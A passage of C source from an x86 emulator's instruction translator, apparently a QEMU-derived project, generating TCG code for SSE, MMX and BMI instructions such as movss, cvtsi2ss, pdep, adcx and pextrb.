0x27f: /* movdqu ea, xmm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_sto_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); } else { rm = (modrm & 7) | REX_B(s); gen_op_movo(s, offsetof(CPUX86State, xmm_regs[rm]), offsetof(CPUX86State,xmm_regs[reg])); } break; case 0x211: /* movss ea, xmm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0))); gen_op_st_v(s, MO_32, s->T0, s->A0); } else { rm = (modrm & 7) | REX_B(s); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[rm].ZMM_L(0)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(0))); } break; case 0x311: /* movsd ea, xmm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[rm].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[reg].ZMM_Q(0))); } break; case 0x013: /* movlps */ case 0x113: /* movlpd */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { goto illegal_op; } break; case 0x017: /* movhps */ case 0x117: /* movhpd */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1))); } else { goto illegal_op; } break; case 0x71: /* shift mm, im */ case 0x72: case 0x73: case 0x171: /* shift xmm, im */ case 0x172: case 0x173: if (b1 >= 2) { goto unknown_op; } val = x86_ldub_code(env, s); if (is_xmm) { tcg_gen_movi_tl(tcg_ctx, s->T0, val); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_t0.ZMM_L(0))); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_t0.ZMM_L(1))); op1_offset = offsetof(CPUX86State,xmm_t0); } else { tcg_gen_movi_tl(tcg_ctx, s->T0, val); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, mmx_t0.MMX_L(0))); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, mmx_t0.MMX_L(1))); op1_offset = offsetof(CPUX86State,mmx_t0); } sse_fn_epp = sse_op_table2[((b - 1) & 3) * 8 + (((modrm >> 3)) & 7)][b1]; if (!sse_fn_epp) { goto unknown_op; } if (is_xmm) { rm = (modrm & 7) | REX_B(s); op2_offset = offsetof(CPUX86State,xmm_regs[rm]); } else { rm = (modrm & 7); op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op2_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op1_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x050: /* movmskps */ rm = (modrm & 7) | REX_B(s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[rm])); gen_helper_movmskps(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp2_i32); break; case 0x150: /* movmskpd */ rm = (modrm & 7) | REX_B(s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[rm])); gen_helper_movmskpd(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp2_i32); break; case 0x02a: /* cvtpi2ps */ case 0x12a: /* cvtpi2pd */ gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); if (mod != 3) { gen_lea_modrm(env, s, modrm); op2_offset = offsetof(CPUX86State,mmx_t0); gen_ldq_env_A0(s, op2_offset); } else { rm = (modrm & 7); op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } op1_offset = offsetof(CPUX86State,xmm_regs[reg]); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); switch(b >> 8) { case 0x0: gen_helper_cvtpi2ps(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; default: case 0x1: gen_helper_cvtpi2pd(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; } break; case 0x22a: /* cvtsi2ss */ case 0x32a: /* cvtsi2sd */ ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); op1_offset = offsetof(CPUX86State,xmm_regs[reg]); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); if (ot == MO_32) { SSEFunc_0_epi sse_fn_epi = sse_op_table3ai[(b >> 8) & 1]; tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); sse_fn_epi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->tmp2_i32); } else { #ifdef TARGET_X86_64 SSEFunc_0_epl sse_fn_epl = sse_op_table3aq[(b >> 8) & 1]; sse_fn_epl(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->T0); #else goto illegal_op; #endif } break; case 0x02c: /* cvttps2pi */ case 0x12c: /* cvttpd2pi */ case 0x02d: /* cvtps2pi */ case 0x12d: /* cvtpd2pi */ gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); if (mod != 3) { gen_lea_modrm(env, s, modrm); op2_offset = offsetof(CPUX86State,xmm_t0); gen_ldo_env_A0(s, op2_offset); } else { rm = (modrm & 7) | REX_B(s); op2_offset = offsetof(CPUX86State,xmm_regs[rm]); } op1_offset = offsetof(CPUX86State,fpregs[reg & 7].mmx); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); switch(b) { case 0x02c: gen_helper_cvttps2pi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x12c: gen_helper_cvttpd2pi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x02d: gen_helper_cvtps2pi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x12d: gen_helper_cvtpd2pi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; } break; case 0x22c: /* cvttss2si */ case 0x32c: /* cvttsd2si */ case 0x22d: /* cvtss2si */ case 0x32d: /* cvtsd2si */ ot = mo_64_32(s->dflag); if (mod != 3) { gen_lea_modrm(env, s, modrm); if ((b >> 8) & 1) { gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_t0.ZMM_Q(0))); } else { gen_op_ld_v(s, MO_32, s->T0, s->A0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_t0.ZMM_L(0))); } op2_offset = offsetof(CPUX86State,xmm_t0); } else { rm = (modrm & 7) | REX_B(s); op2_offset = offsetof(CPUX86State,xmm_regs[rm]); } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op2_offset); if (ot == MO_32) { SSEFunc_i_ep sse_fn_i_ep = sse_op_table3bi[((b >> 7) & 2) | (b & 1)]; sse_fn_i_ep(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); } else { #ifdef TARGET_X86_64 SSEFunc_l_ep sse_fn_l_ep = sse_op_table3bq[((b >> 7) & 2) | (b & 1)]; sse_fn_l_ep(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->ptr0); #else goto illegal_op; #endif } gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0xc4: /* pinsrw */ case 0x1c4: s->rip_offset = 1; gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); val = x86_ldub_code(env, s); if (b1) { val &= 7; tcg_gen_st16_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg].ZMM_W(val))); } else { val &= 3; tcg_gen_st16_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx.MMX_W(val))); } break; case 0xc5: /* pextrw */ case 0x1c5: if (mod != 3) goto illegal_op; ot = mo_64_32(s->dflag); val = x86_ldub_code(env, s); if (b1) { val &= 7; rm = (modrm & 7) | REX_B(s); tcg_gen_ld16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[rm].ZMM_W(val))); } else { val &= 3; rm = (modrm & 7); tcg_gen_ld16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[rm].mmx.MMX_W(val))); } reg = ((modrm >> 3) & 7) | rex_r; gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0x1d6: /* movq ea, xmm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[rm].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[reg].ZMM_Q(0))); gen_op_movq_env_0(s, offsetof(CPUX86State, xmm_regs[rm].ZMM_Q(1))); } break; case 0x2d6: /* movq2dq */ gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); rm = (modrm & 7); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,fpregs[rm].mmx)); gen_op_movq_env_0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1))); break; case 0x3d6: /* movdq2q */ gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, fpregs[reg & 7].mmx), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); break; case 0xd7: /* pmovmskb */ case 0x1d7: if (mod != 3) goto illegal_op; if (b1) { rm = (modrm & 7) | REX_B(s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[rm])); gen_helper_pmovmskb_xmm(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); } else { rm = (modrm & 7); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State, fpregs[rm].mmx)); gen_helper_pmovmskb_mmx(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); } reg = ((modrm >> 3) & 7) | rex_r; tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp2_i32); break; case 0x138: case 0x038: b = modrm; if ((b & 0xf0) == 0xf0) { goto do_0f_38_fx; } modrm = x86_ldub_code(env, s); rm = modrm & 7; reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; if (b1 >= 2) { goto unknown_op; } sse_fn_epp = sse_op_table6[b].op[b1]; if (!sse_fn_epp) { goto unknown_op; } if (!(s->cpuid_ext_features & sse_op_table6[b].ext_mask)) goto illegal_op; if (b1) { op1_offset = offsetof(CPUX86State,xmm_regs[reg]); if (mod == 3) { op2_offset = offsetof(CPUX86State,xmm_regs[rm | REX_B(s)]); } else { op2_offset = offsetof(CPUX86State,xmm_t0); gen_lea_modrm(env, s, modrm); switch (b) { case 0x20: case 0x30: /* pmovsxbw, pmovzxbw */ case 0x23: case 0x33: /* pmovsxwd, pmovzxwd */ case 0x25: case 0x35: /* pmovsxdq, pmovzxdq */ gen_ldq_env_A0(s, op2_offset + offsetof(ZMMReg, ZMM_Q(0))); break; case 0x21: case 0x31: /* pmovsxbd, pmovzxbd */ case 0x24: case 0x34: /* pmovsxwq, pmovzxwq */ tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, op2_offset + offsetof(ZMMReg, ZMM_L(0))); break; case 0x22: case 0x32: /* pmovsxbq, pmovzxbq */ tcg_gen_qemu_ld_tl(tcg_ctx, s->tmp0, s->A0, s->mem_index, MO_LEUW); tcg_gen_st16_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_env, op2_offset + offsetof(ZMMReg, ZMM_W(0))); break; case 0x2a: /* movntqda */ gen_ldo_env_A0(s, op1_offset); return; default: gen_ldo_env_A0(s, op2_offset); } } } else { op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); if (mod == 3) { op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } else { op2_offset = offsetof(CPUX86State,mmx_t0); gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, op2_offset); } } if (sse_fn_epp == SSE_SPECIAL) { goto unknown_op; } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); if (b == 0x17) { set_cc_op(s, CC_OP_EFLAGS); } break; case 0x238: case 0x338: do_0f_38_fx: /* Various integer extensions at 0f 38 f[0-f]. */ b = modrm | (b1 << 8); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; switch (b) { case 0x3f0: /* crc32 Gd,Eb */ case 0x3f1: /* crc32 Gd,Ey */ do_crc32: if (!(s->cpuid_ext_features & CPUID_EXT_SSE42)) { goto illegal_op; } if ((b & 0xff) == 0xf0) { ot = MO_8; } else if (s->dflag != MO_64) { ot = (s->prefix & PREFIX_DATA ? MO_16 : MO_32); } else { ot = MO_64; } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[reg]); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_helper_crc32(tcg_ctx, s->T0, s->tmp2_i32, s->T0, tcg_const_i32(tcg_ctx, 8 << ot)); ot = mo_64_32(s->dflag); gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0x1f0: /* crc32 or movbe */ case 0x1f1: /* For these insns, the f3 prefix is supposed to have priority over the 66 prefix, but that's not what we implement above setting b1. */ if (s->prefix & PREFIX_REPNZ) { goto do_crc32; } /* FALLTHRU */ case 0x0f0: /* movbe Gy,My */ case 0x0f1: /* movbe My,Gy */ if (!(s->cpuid_ext_features & CPUID_EXT_MOVBE)) { goto illegal_op; } if (s->dflag != MO_64) { ot = (s->prefix & PREFIX_DATA ? MO_16 : MO_32); } else { ot = MO_64; } gen_lea_modrm(env, s, modrm); if ((b & 1) == 0) { tcg_gen_qemu_ld_tl(tcg_ctx, s->T0, s->A0, s->mem_index, ot | MO_BE); gen_op_mov_reg_v(s, ot, reg, s->T0); } else { tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->A0, s->mem_index, ot | MO_BE); } break; case 0x0f2: /* andn Gy, By, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); tcg_gen_andc_tl(tcg_ctx, s->T0, s->T0, tcg_ctx->cpu_regs[s->vex_v]); gen_op_mov_reg_v(s, ot, reg, s->T0); gen_op_update1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); break; case 0x0f7: /* bextr Gy, Ey, By */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); { TCGv bound, zero; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); /* Extract START, and shift the operand. Shifts larger than operand size get zeros. */ tcg_gen_ext8u_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[s->vex_v]); tcg_gen_shr_tl(tcg_ctx, s->T0, s->T0, s->A0); bound = tcg_const_tl(tcg_ctx, ot == MO_64 ? 63 : 31); zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LEU, s->T0, s->A0, bound, s->T0, zero); tcg_temp_free(tcg_ctx, zero); /* Extract the LEN into a mask. Lengths larger than operand size get all ones. */ tcg_gen_extract_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[s->vex_v], 8, 8); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LEU, s->A0, s->A0, bound, s->A0, bound); tcg_temp_free(tcg_ctx, bound); tcg_gen_movi_tl(tcg_ctx, s->T1, 1); tcg_gen_shl_tl(tcg_ctx, s->T1, s->T1, s->A0); tcg_gen_subi_tl(tcg_ctx, s->T1, s->T1, 1); tcg_gen_and_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, ot, reg, s->T0); gen_op_update1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); } break; case 0x0f5: /* bzhi Gy, Ey, By */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); tcg_gen_ext8u_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); { TCGv bound = tcg_const_tl(tcg_ctx, ot == MO_64 ? 63 : 31); /* Note that since we're using BMILG (in order to get O cleared) we need to store the inverse into C. */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_cc_src, s->T1, bound); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, s->T1, s->T1, bound, bound, s->T1); tcg_temp_free(tcg_ctx, bound); } tcg_gen_movi_tl(tcg_ctx, s->A0, -1); tcg_gen_shl_tl(tcg_ctx, s->A0, s->A0, s->T1); tcg_gen_andc_tl(tcg_ctx, s->T0, s->T0, s->A0); gen_op_mov_reg_v(s, ot, reg, s->T0); gen_op_update1_cc(s); set_cc_op(s, CC_OP_BMILGB + ot); break; case 0x3f6: /* mulx By, Gy, rdx, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); switch (ot) { default: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, tcg_ctx->cpu_regs[R_EDX]); tcg_gen_mulu2_i32(tcg_ctx, s->tmp2_i32, s->tmp3_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[s->vex_v], s->tmp2_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp3_i32); break; #ifdef TARGET_X86_64 case MO_64: tcg_gen_mulu2_i64(tcg_ctx, s->T0, s->T1, s->T0, tcg_ctx->cpu_regs[R_EDX]); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_regs[s->vex_v], s->T0); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T1); break; #endif } break; case 0x3f5: /* pdep Gy, By, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); /* Note that by zero-extending the source operand, we automatically handle zero-extending the result. */ if (ot == MO_64) { tcg_gen_mov_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); } else { tcg_gen_ext32u_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); } gen_helper_pdep(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T1, s->T0); break; case 0x2f5: /* pext Gy, By, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); /* Note that by zero-extending the source operand, we automatically handle zero-extending the result. */ if (ot == MO_64) { tcg_gen_mov_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); } else { tcg_gen_ext32u_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); } gen_helper_pext(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T1, s->T0); break; case 0x1f6: /* adcx Gy, Ey */ case 0x2f6: /* adox Gy, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_ADX)) { goto illegal_op; } else { TCGv carry_in, carry_out, zero; int end_op; ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); /* Re-use the carry-out from a previous round. */ carry_in = NULL; carry_out = (b == 0x1f6 ? tcg_ctx->cpu_cc_dst : tcg_ctx->cpu_cc_src2); switch (s->cc_op) { case CC_OP_ADCX: if (b == 0x1f6) { carry_in = tcg_ctx->cpu_cc_dst; end_op = CC_OP_ADCX; } else { end_op = CC_OP_ADCOX; } break; case CC_OP_ADOX: if (b == 0x1f6) { end_op = CC_OP_ADCOX; } else { carry_in = tcg_ctx->cpu_cc_src2; end_op = CC_OP_ADOX; } break; case CC_OP_ADCOX: end_op = CC_OP_ADCOX; carry_in = carry_out; break; default: end_op = (b == 0x1f6 ? CC_OP_ADCX : CC_OP_ADOX); break; } /* If we can't reuse carry-out, get it out of EFLAGS. */ if (!carry_in) { if (s->cc_op != CC_OP_ADCX && s->cc_op != CC_OP_ADOX) { gen_compute_eflags(s); } carry_in = s->tmp0; tcg_gen_extract_tl(tcg_ctx, carry_in, tcg_ctx->cpu_cc_src, ctz32(b == 0x1f6 ? CC_C : CC_O), 1); } switch (ot) { #ifdef TARGET_X86_64 case MO_32: /* If we know TL is 64-bit, and we want a 32-bit result, just do everything in 64-bit arithmetic. */ tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_regs[reg], tcg_ctx->cpu_regs[reg]); tcg_gen_ext32u_i64(tcg_ctx, s->T0, s->T0); tcg_gen_add_i64(tcg_ctx, s->T0, s->T0, tcg_ctx->cpu_regs[reg]); tcg_gen_add_i64(tcg_ctx, s->T0, s->T0, carry_in); tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T0); tcg_gen_shri_i64(tcg_ctx, carry_out, s->T0, 32); break; #endif default: /* Otherwise compute the carry-out in two steps. */ zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_add2_tl(tcg_ctx, s->T0, carry_out, s->T0, zero, carry_in, zero); tcg_gen_add2_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], carry_out, tcg_ctx->cpu_regs[reg], carry_out, s->T0, zero); tcg_temp_free(tcg_ctx, zero); break; } set_cc_op(s, end_op); } break; case 0x1f7: /* shlx Gy, Ey, By */ case 0x2f7: /* sarx Gy, Ey, By */ case 0x3f7: /* shrx Gy, Ey, By */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); if (ot == MO_64) { tcg_gen_andi_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v], 63); } else { tcg_gen_andi_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v], 31); } if (b == 0x1f7) { tcg_gen_shl_tl(tcg_ctx, s->T0, s->T0, s->T1); } else if (b == 0x2f7) { if (ot != MO_64) { tcg_gen_ext32s_tl(tcg_ctx, s->T0, s->T0); } tcg_gen_sar_tl(tcg_ctx, s->T0, s->T0, s->T1); } else { if (ot != MO_64) { tcg_gen_ext32u_tl(tcg_ctx, s->T0, s->T0); } tcg_gen_shr_tl(tcg_ctx, s->T0, s->T0, s->T1); } gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0x0f3: case 0x1f3: case 0x2f3: case 0x3f3: /* Group 17 */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); switch (reg & 7) { case 1: /* blsr By,Ey */ tcg_gen_subi_tl(tcg_ctx, s->T1, s->T0, 1); tcg_gen_and_tl(tcg_ctx, s->T0, s->T0, s->T1); break; case 2: /* blsmsk By,Ey */ tcg_gen_subi_tl(tcg_ctx, s->T1, s->T0, 1); tcg_gen_xor_tl(tcg_ctx, s->T0, s->T0, s->T1); break; case 3: /* blsi By, Ey */ tcg_gen_neg_tl(tcg_ctx, s->T1, s->T0); tcg_gen_and_tl(tcg_ctx, s->T0, s->T0, s->T1); break; default: goto unknown_op; } tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); gen_op_mov_reg_v(s, ot, s->vex_v, s->T0); set_cc_op(s, CC_OP_BMILGB + ot); break; default: goto unknown_op; } break; case 0x03a: case 0x13a: b = modrm; modrm = x86_ldub_code(env, s); rm = modrm & 7; reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; if (b1 >= 2) { goto unknown_op; } sse_fn_eppi = sse_op_table7[b].op[b1]; if (!sse_fn_eppi) { goto unknown_op; } if (!(s->cpuid_ext_features & sse_op_table7[b].ext_mask)) goto illegal_op; s->rip_offset = 1; if (sse_fn_eppi == SSE_SPECIAL) { ot = mo_64_32(s->dflag); rm = (modrm & 7) | REX_B(s); if (mod != 3) gen_lea_modrm(env, s, modrm); reg = ((modrm >> 3) & 7) | rex_r; val = x86_ldub_code(env, s); switch (b) { case 0x14: /* pextrb */ tcg_gen_ld8u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_B(val & 15))); if (mod == 3) { gen_op_mov_reg_v(s, ot, rm, s->T0); } else { tcg_gen_qemu_st_tl(tcg_ctx, s->T0, s->A0, s->mem_index, MO_UB); } break; case 0x15: /* pextrw */ tcg_gen_ld16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_W(val & 7))); if (mod == 3) { gen_op_mov_reg_v(s, ot, rm, s->T0); } else { tcg_gen_qemu_st_tl(tcg_ctx, s->T0, s->A0, s->mem_index, MO_LEUW); } break; case 0x16: if (ot == MO_32) { /* pextrd */ tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(val & 3))); if (mod == 3) { tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[rm], s->tmp2_i32); } else { tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); } } else { /* pextrq */ #ifdef TARGET_X86_64 tcg_gen_ld_i64(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(val & 1))); if (mod == 3) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_regs[rm], s->tmp1_i64); } else { tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); } #else goto illegal_op; #endif } break; case 0x17: /* extractps */ tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(val & 3))); if (mod == 3) { gen_op_mov_reg_v(s, ot, rm, s->T0); } else { tcg_gen_qemu_st_tl(tcg_ctx, s->T0, s->A0, s->mem_index, MO_LEUL); } break; case 0x20: /* pinsrb */ if (mod == 3) { gen_op_mov_v_reg(s, MO_32, s->T0, rm); } else { tcg_gen_qemu_ld_tl(tcg_ctx, s->T0, s->A0, s->mem_index, MO_UB); } tcg_gen_st8_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_B(val & 15))); break; case 0x21: /* insertps */ if (mod == 3) { tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[rm] .ZMM_L((val >> 6) & 3))); } else { tcg_gen_qemu_ld_i32(tcg_ctx, 